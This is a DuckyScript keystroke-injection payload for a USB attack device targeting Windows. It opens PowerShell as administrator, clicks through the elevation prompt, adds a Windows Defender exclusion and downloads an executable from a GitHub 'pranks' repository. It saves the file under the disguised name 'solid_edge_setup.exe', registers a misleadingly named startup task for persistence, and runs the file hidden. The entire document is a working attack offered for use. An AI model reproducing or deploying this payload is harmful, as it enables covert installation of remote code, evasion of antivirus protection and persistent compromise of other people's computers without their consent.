REM Open Powershell admin
GUI r
DELAY  1000
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY  1000
TAB
TAB
ENTER
DELAY  1000
REM Add exclusion for windows defender
STRING Add-MpPreference -ExclusionPath "$env:APPDATA\solid_edge_setup.exe"
ENTER
DELAY  1000 
REM Get file from github
STRING cd $env:APPDATA
REM Another option would be to do net webClient
REM $webClient = New-Object System.Net.WebClient
REM $webClient.DownloadFile("https://github.com/TimothyBaalman/pranks/raw/main/dist/random_mouse.exe", "$env:APPDATA\solid_edge_setup.exe")
STRING Invoke-WebRequest -Uri "https://github.com/TimothyBaalman/pranks/raw/main/dist/random_mouse.exe" -OutFile "solid_edge_setup.exe"
ENTER
DELAY  1000
REM This script sets up a task to run a program on startup
STRING $action = New-ScheduledTaskAction -Execute '$env:APPDATA\solid_edge_setup.exe'
ENTER
DELAY  1000
STRING $trigger = New-ScheduledTaskTrigger -AtStartup
ENTER
DELAY  1000
STRING $settings = New-ScheduledTaskSettingsSet
ENTER
DELAY  1000
STRING Register-ScheduledTask -TaskName "SolidEdgeSetupTask" -Action $action -Trigger $trigger -Settings $settings
ENTER
DELAY  1000
REM Run the program now
STRING Start-Process "$env:APPDATA\solid_edge_setup.exe" -WindowStyle Hidden
DELAY  1000
STRING exit